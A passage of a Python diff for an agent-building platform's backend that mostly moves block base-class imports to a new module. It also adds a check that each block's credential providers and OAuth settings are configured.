+    except Exception as e:
+        # If we can't create a block instance, assume it's not OAuth-only
+        logger.error(f"Error creating block instance for {block_cls.__name__}: {e}")
+        return True
+    logger.debug(
+        f"Checking if block {block_cls.__name__} has a valid provider configured"
+    )
+
+    # Get all credential inputs from input schema
+    credential_inputs = block.input_schema.get_credentials_fields_info()
+    required_inputs = block.input_schema.get_required_fields()
+    if not credential_inputs:
+        logger.debug(
+            f"Block {block_cls.__name__} has no credential inputs - Treating as valid"
+        )
+        return True
+
+    # Check credential inputs
+    if len(required_inputs.intersection(credential_inputs.keys())) == 0:
+        logger.debug(
+            f"Block {block_cls.__name__} has only optional credential inputs"
+            " - will work without credentials configured"
+        )
+
+    # Check if the credential inputs for this block are correctly configured
+    for field_name, field_info in credential_inputs.items():
+        provider_names = field_info.provider
+        if not provider_names:
+            logger.warning(
+                f"Block {block_cls.__name__} "
+                f"has credential input '{field_name}' with no provider options"
+                " - Disabling"
+            )
+            return False
+
+        # If a field has multiple possible providers, each one needs to be usable to
+        # prevent breaking the UX
+        for _provider_name in provider_names:
+            provider_name = _provider_name.value
+            if provider_name in ProviderName.__members__.values():
+                logger.debug(
+                    f"Block {block_cls.__name__} credential input '{field_name}' "
+                    f"provider '{provider_name}' is part of the legacy provider system"
+                    " - Treating as valid"
+                )
+                break
+
+            provider = AutoRegistry.get_provider(provider_name)
+            if not provider:
+                logger.warning(
+                    f"Block {block_cls.__name__} credential input '{field_name}' "
+                    f"refers to unknown provider '{provider_name}' - Disabling"
+                )
+                return False
+
+            # Check the provider's supported auth types
+            if field_info.supported_types != provider.supported_auth_types:
+                logger.warning(
+                    f"Block {block_cls.__name__} credential input '{field_name}' "
+                    f"has mismatched supported auth types (field <> Provider): "
+                    f"{field_info.supported_types} != {provider.supported_auth_types}"
+                )
+
+            if not (supported_auth_types := provider.supported_auth_types):
+                # No auth methods are been configured for this provider
+                logger.warning(
+                    f"Block {block_cls.__name__} credential input '{field_name}' "
+                    f"provider '{provider_name}' "
+                    "has no authentication methods configured - Disabling"
+                )
+                return False
+
+            # Check if provider supports OAuth
+            if "oauth2" in supported_auth_types:
+                # Check if OAuth environment variables are set
+                if (oauth_config := provider.oauth_config) and bool(
+                    os.getenv(oauth_config.client_id_env_var)
+                    and os.getenv(oauth_config.client_secret_env_var)
+                ):
+                    logger.debug(
+                        f"Block {block_cls.__name__} credential input '{field_name}' "
+                        f"provider '{provider_name}' is configured for OAuth"
+                    )
+                else:
+                    logger.error(
+                        f"Block {block_cls.__name__} credential input '{field_name}' "
+                        f"provider '{provider_name}' "
+                        "is missing OAuth client ID or secret - Disabling"
+                    )
+                    return False
+
+        logger.debug(
+            f"Block {block_cls.__name__} credential input '{field_name}' is valid; "
+            f"supported credential types: {', '.join(field_info.supported_types)}"
+        )
+
+    return True
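As the `__init__.py` hunks earlier show, `load_all_blocks` now imports this predicate from `._utils` to drop blocks whose providers lack usable auth configuration. A condensed sketch of that call-site shape, assuming `available_blocks` has already been built by the loader:

```python
# Sketch only; mirrors the load_all_blocks() filtering hunk shown earlier.
from backend.blocks._utils import is_block_auth_configured

filtered_blocks = {}
for block_id, block_cls in available_blocks.items():  # built by the loader
    if is_block_auth_configured(block_cls):
        filtered_blocks[block_id] = block_cls
```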
@@ -1,7 +1,7 @@
 import logging
-from typing import Any, Optional
+from typing import TYPE_CHECKING, Any, Optional
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockInput,
@@ -9,13 +9,15 @@ from backend.data.block import (
     BlockSchema,
     BlockSchemaInput,
     BlockType,
-    get_block,
 )
 from backend.data.execution import ExecutionContext, ExecutionStatus, NodesInputMasks
 from backend.data.model import NodeExecutionStats, SchemaField
 from backend.util.json import validate_with_jsonschema
 from backend.util.retry import func_retry
 
+if TYPE_CHECKING:
+    from backend.executor.utils import LogMetadata
+
 _logger = logging.getLogger(__name__)
 
 
@@ -124,9 +126,10 @@ class AgentExecutorBlock(Block):
         graph_version: int,
         graph_exec_id: str,
         user_id: str,
-        logger,
+        logger: "LogMetadata",
     ) -> BlockOutput:
 
+        from backend.blocks import get_block
         from backend.data.execution import ExecutionEventType
         from backend.executor import utils as execution_utils
 
@@ -198,7 +201,7 @@ class AgentExecutorBlock(Block):
         self,
         graph_exec_id: str,
         user_id: str,
-        logger,
+        logger: "LogMetadata",
     ) -> None:
         from backend.executor import utils as execution_utils
 
@@ -1,5 +1,11 @@
 from typing import Any
 
+from backend.blocks._base import (
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.blocks.llm import (
     DEFAULT_LLM_MODEL,
     TEST_CREDENTIALS,
@@ -11,12 +17,6 @@ from backend.blocks.llm import (
     LLMResponse,
     llm_call,
 )
-from backend.data.block import (
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.data.model import APIKeyCredentials, NodeExecutionStats, SchemaField
 
 
@@ -6,7 +6,7 @@ from pydantic import SecretStr
|
|||||||
from replicate.client import Client as ReplicateClient
|
from replicate.client import Client as ReplicateClient
|
||||||
from replicate.helpers import FileOutput
|
from replicate.helpers import FileOutput
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -5,7 +5,12 @@ from pydantic import SecretStr
|
|||||||
from replicate.client import Client as ReplicateClient
|
from replicate.client import Client as ReplicateClient
|
||||||
from replicate.helpers import FileOutput
|
from replicate.helpers import FileOutput
|
||||||
|
|
||||||
from backend.data.block import Block, BlockCategory, BlockSchemaInput, BlockSchemaOutput
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.model import (
|
from backend.data.model import (
|
||||||
APIKeyCredentials,
|
APIKeyCredentials,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from typing import Literal
|
|||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
from replicate.client import Client as ReplicateClient
|
from replicate.client import Client as ReplicateClient
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from typing import Literal
|
|||||||
|
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,3 +1,10 @@
|
|||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.apollo._api import ApolloClient
|
from backend.blocks.apollo._api import ApolloClient
|
||||||
from backend.blocks.apollo._auth import (
|
from backend.blocks.apollo._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
@@ -10,13 +17,6 @@ from backend.blocks.apollo.models import (
|
|||||||
PrimaryPhone,
|
PrimaryPhone,
|
||||||
SearchOrganizationsRequest,
|
SearchOrganizationsRequest,
|
||||||
)
|
)
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import CredentialsField, SchemaField
|
from backend.data.model import CredentialsField, SchemaField
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -1,5 +1,12 @@
|
|||||||
import asyncio
|
import asyncio
|
||||||
|
|
||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.apollo._api import ApolloClient
|
from backend.blocks.apollo._api import ApolloClient
|
||||||
from backend.blocks.apollo._auth import (
|
from backend.blocks.apollo._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
@@ -14,13 +21,6 @@ from backend.blocks.apollo.models import (
|
|||||||
SearchPeopleRequest,
|
SearchPeopleRequest,
|
||||||
SenorityLevels,
|
SenorityLevels,
|
||||||
)
|
)
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import CredentialsField, SchemaField
|
from backend.data.model import CredentialsField, SchemaField
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -1,3 +1,10 @@
|
|||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.apollo._api import ApolloClient
|
from backend.blocks.apollo._api import ApolloClient
|
||||||
from backend.blocks.apollo._auth import (
|
from backend.blocks.apollo._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
@@ -6,13 +13,6 @@ from backend.blocks.apollo._auth import (
|
|||||||
ApolloCredentialsInput,
|
ApolloCredentialsInput,
|
||||||
)
|
)
|
||||||
from backend.blocks.apollo.models import Contact, EnrichPersonRequest
|
from backend.blocks.apollo.models import Contact, EnrichPersonRequest
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import CredentialsField, SchemaField
|
from backend.data.model import CredentialsField, SchemaField
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import Optional
|
|||||||
|
|
||||||
from pydantic import BaseModel, Field
|
from pydantic import BaseModel, Field
|
||||||
|
|
||||||
from backend.data.block import BlockSchemaInput
|
from backend.blocks._base import BlockSchemaInput
|
||||||
from backend.data.model import SchemaField, UserIntegrations
|
from backend.data.model import SchemaField, UserIntegrations
|
||||||
from backend.integrations.ayrshare import AyrshareClient
|
from backend.integrations.ayrshare import AyrshareClient
|
||||||
from backend.util.clients import get_database_manager_async_client
|
from backend.util.clients import get_database_manager_async_client
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import enum
|
import enum
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ import os
|
|||||||
import re
|
import re
|
||||||
from typing import Type
|
from typing import Type
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
from enum import Enum
|
from enum import Enum
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from typing import Literal, Optional
|
|||||||
from e2b import AsyncSandbox as BaseAsyncSandbox
|
from e2b import AsyncSandbox as BaseAsyncSandbox
|
||||||
from pydantic import BaseModel, SecretStr
|
from pydantic import BaseModel, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from e2b_code_interpreter import Result as E2BExecutionResult
|
|||||||
from e2b_code_interpreter.charts import Chart as E2BExecutionResultChart
|
from e2b_code_interpreter.charts import Chart as E2BExecutionResultChart
|
||||||
from pydantic import BaseModel, Field, JsonValue, SecretStr
|
from pydantic import BaseModel, Field, JsonValue, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import re
|
import re
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from openai import AsyncOpenAI
|
|||||||
from openai.types.responses import Response as OpenAIResponse
|
from openai.types.responses import Response as OpenAIResponse
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockManualWebhookConfig,
|
BlockManualWebhookConfig,
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
from typing import Any, List
|
from typing import Any, List
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import codecs
|
import codecs
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ from typing import Any, Literal, cast
|
|||||||
import discord
|
import discord
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@
|
|||||||
Discord OAuth-based blocks.
|
Discord OAuth-based blocks.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -7,7 +7,7 @@ from typing import Literal
|
|||||||
|
|
||||||
from pydantic import BaseModel, ConfigDict, SecretStr
|
from pydantic import BaseModel, ConfigDict, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@
|
|||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ which provides access to LinkedIn profile data and related information.
|
|||||||
import logging
|
import logging
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -3,6 +3,13 @@ import logging
|
|||||||
from enum import Enum
|
from enum import Enum
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.fal._auth import (
|
from backend.blocks.fal._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
TEST_CREDENTIALS_INPUT,
|
TEST_CREDENTIALS_INPUT,
|
||||||
@@ -10,13 +17,6 @@ from backend.blocks.fal._auth import (
|
|||||||
FalCredentialsField,
|
FalCredentialsField,
|
||||||
FalCredentialsInput,
|
FalCredentialsInput,
|
||||||
)
|
)
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.file import store_media_file
|
from backend.util.file import store_media_file
|
||||||
|
@@ -5,7 +5,7 @@ from pydantic import SecretStr
 from replicate.client import Client as ReplicateClient
 from replicate.helpers import FileOutput
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -3,7 +3,7 @@ from typing import Optional
 
 from pydantic import BaseModel
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -5,7 +5,7 @@ from typing import Optional
 
 from typing_extensions import TypedDict
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -3,7 +3,7 @@ from urllib.parse import urlparse
 
 from typing_extensions import TypedDict
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -2,7 +2,7 @@ import re
 
 from typing_extensions import TypedDict
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -2,7 +2,7 @@ import base64
 
 from typing_extensions import TypedDict
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -4,7 +4,7 @@ from typing import Any, List, Optional
 
 from typing_extensions import TypedDict
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -3,7 +3,7 @@ from typing import Optional
 
 from pydantic import BaseModel
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -4,7 +4,7 @@ from pathlib import Path
 
 from pydantic import BaseModel
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -8,7 +8,7 @@ from google.oauth2.credentials import Credentials
 from googleapiclient.discovery import build
 from pydantic import BaseModel
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
@@ -7,14 +7,14 @@ from google.oauth2.credentials import Credentials
 from googleapiclient.discovery import build
 from gravitas_md2gdocs import to_requests
 
-from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
 from backend.data.model import SchemaField
 from backend.util.settings import Settings
 
@@ -14,7 +14,7 @@ from google.oauth2.credentials import Credentials
 from googleapiclient.discovery import build
 from pydantic import BaseModel, Field
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
@@ -7,14 +7,14 @@ from enum import Enum
 from google.oauth2.credentials import Credentials
 from googleapiclient.discovery import build
 
-from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
 from backend.data.model import SchemaField
 from backend.util.settings import Settings
 
@@ -3,7 +3,7 @@ from typing import Literal
 import googlemaps
 from pydantic import BaseModel, SecretStr
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
@@ -9,9 +9,7 @@ from typing import Any, Optional
 from prisma.enums import ReviewStatus
 from pydantic import BaseModel
 
-from backend.data.execution import ExecutionStatus
 from backend.data.human_review import ReviewResult
-from backend.executor.manager import async_update_node_execution_status
 from backend.util.clients import get_database_manager_async_client
 
 logger = logging.getLogger(__name__)

@@ -43,6 +41,8 @@ class HITLReviewHelper:
     @staticmethod
     async def update_node_execution_status(**kwargs) -> None:
         """Update the execution status of a node."""
+        from backend.executor.manager import async_update_node_execution_status
+
         await async_update_node_execution_status(
             db_client=get_database_manager_async_client(), **kwargs
         )

@@ -88,12 +88,13 @@ class HITLReviewHelper:
         Raises:
             Exception: If review creation or status update fails
         """
+        from backend.data.execution import ExecutionStatus
 
         # Note: Safe mode checks (human_in_the_loop_safe_mode, sensitive_action_safe_mode)
         # are handled by the caller:
         # - HITL blocks check human_in_the_loop_safe_mode in their run() method
         # - Sensitive action blocks check sensitive_action_safe_mode in is_block_exec_need_review()
         # This function only handles checking for existing approvals.
 
         # Check if this node has already been approved (normal or auto-approval)
         if approval_result := await HITLReviewHelper.check_approval(
             node_exec_id=node_exec_id,
@@ -8,7 +8,7 @@ from typing import Literal
 import aiofiles
 from pydantic import SecretStr
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
@@ -1,15 +1,15 @@
-from backend.blocks.hubspot._auth import (
-    HubSpotCredentials,
-    HubSpotCredentialsField,
-    HubSpotCredentialsInput,
-)
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.hubspot._auth import (
+    HubSpotCredentials,
+    HubSpotCredentialsField,
+    HubSpotCredentialsInput,
+)
 from backend.data.model import SchemaField
 from backend.util.request import Requests
 

@@ -1,15 +1,15 @@
-from backend.blocks.hubspot._auth import (
-    HubSpotCredentials,
-    HubSpotCredentialsField,
-    HubSpotCredentialsInput,
-)
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.hubspot._auth import (
+    HubSpotCredentials,
+    HubSpotCredentialsField,
+    HubSpotCredentialsInput,
+)
 from backend.data.model import SchemaField
 from backend.util.request import Requests
 

@@ -1,17 +1,17 @@
 from datetime import datetime, timedelta
 
-from backend.blocks.hubspot._auth import (
-    HubSpotCredentials,
-    HubSpotCredentialsField,
-    HubSpotCredentialsInput,
-)
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.hubspot._auth import (
+    HubSpotCredentials,
+    HubSpotCredentialsField,
+    HubSpotCredentialsInput,
+)
 from backend.data.model import SchemaField
 from backend.util.request import Requests
 
@@ -3,8 +3,7 @@ from typing import Any
 
 from prisma.enums import ReviewStatus
 
-from backend.blocks.helpers.review import HITLReviewHelper
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -12,6 +11,7 @@ from backend.data.block import (
     BlockSchemaOutput,
     BlockType,
 )
+from backend.blocks.helpers.review import HITLReviewHelper
 from backend.data.execution import ExecutionContext
 from backend.data.human_review import ReviewResult
 from backend.data.model import SchemaField
@@ -3,7 +3,7 @@ from typing import Any, Dict, Literal, Optional
 
 from pydantic import SecretStr
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
@@ -2,9 +2,7 @@ import copy
 from datetime import date, time
 from typing import Any, Optional
 
-# Import for Google Drive file input block
-from backend.blocks.google._drive import AttachmentView, GoogleDriveFile
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -12,6 +10,9 @@ from backend.data.block import (
     BlockSchemaInput,
     BlockType,
 )
+
+# Import for Google Drive file input block
+from backend.blocks.google._drive import AttachmentView, GoogleDriveFile
 from backend.data.execution import ExecutionContext
 from backend.data.model import SchemaField
 from backend.util.file import store_media_file
@@ -1,6 +1,6 @@
 from typing import Any
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
@@ -1,15 +1,15 @@
-from backend.blocks.jina._auth import (
-    JinaCredentials,
-    JinaCredentialsField,
-    JinaCredentialsInput,
-)
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.jina._auth import (
+    JinaCredentials,
+    JinaCredentialsField,
+    JinaCredentialsInput,
+)
 from backend.data.model import SchemaField
 from backend.util.request import Requests
 

@@ -1,15 +1,15 @@
-from backend.blocks.jina._auth import (
-    JinaCredentials,
-    JinaCredentialsField,
-    JinaCredentialsInput,
-)
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.jina._auth import (
+    JinaCredentials,
+    JinaCredentialsField,
+    JinaCredentialsInput,
+)
 from backend.data.model import SchemaField
 from backend.util.request import Requests
 

@@ -3,18 +3,18 @@ from urllib.parse import quote
 
 from typing_extensions import TypedDict
 
-from backend.blocks.jina._auth import (
-    JinaCredentials,
-    JinaCredentialsField,
-    JinaCredentialsInput,
-)
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.jina._auth import (
+    JinaCredentials,
+    JinaCredentialsField,
+    JinaCredentialsInput,
+)
 from backend.data.model import SchemaField
 from backend.util.request import Requests
 
@@ -1,5 +1,12 @@
 from urllib.parse import quote
 
+from backend.blocks._base import (
+    Block,
+    BlockCategory,
+    BlockOutput,
+    BlockSchemaInput,
+    BlockSchemaOutput,
+)
 from backend.blocks.jina._auth import (
     TEST_CREDENTIALS,
     TEST_CREDENTIALS_INPUT,

@@ -8,13 +15,6 @@ from backend.blocks.jina._auth import (
     JinaCredentialsInput,
 )
 from backend.blocks.search import GetRequest
-from backend.data.block import (
-    Block,
-    BlockCategory,
-    BlockOutput,
-    BlockSchemaInput,
-    BlockSchemaOutput,
-)
 from backend.data.model import SchemaField
 from backend.util.exceptions import BlockExecutionError
 
@@ -15,7 +15,7 @@ from anthropic.types import ToolParam
 from groq import AsyncGroq
 from pydantic import BaseModel, SecretStr
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -2,7 +2,7 @@ import operator
 from enum import Enum
 from typing import Any
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -3,7 +3,7 @@ from typing import List, Literal
 
 from pydantic import SecretStr
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -3,7 +3,7 @@ from typing import Any, Literal, Optional, Union
 from mem0 import MemoryClient
 from pydantic import BaseModel, SecretStr
 
-from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
+from backend.blocks._base import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
 from backend.data.model import (
     APIKeyCredentials,
     CredentialsField,

@@ -4,7 +4,7 @@ from typing import Any, Dict, List, Optional
 
 from pydantic import model_validator
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -2,7 +2,7 @@ from __future__ import annotations
 
 from typing import Any, Dict, List, Optional
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -1,6 +1,6 @@
 from __future__ import annotations
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -1,6 +1,6 @@
 from __future__ import annotations
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,

@@ -4,7 +4,7 @@ from typing import List, Optional
 
 from pydantic import BaseModel
 
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
     BlockOutput,
@@ -1,15 +1,15 @@
-from backend.blocks.nvidia._auth import (
-    NvidiaCredentials,
-    NvidiaCredentialsField,
-    NvidiaCredentialsInput,
-)
-from backend.data.block import (
+from backend.blocks._base import (
     Block,
     BlockCategory,
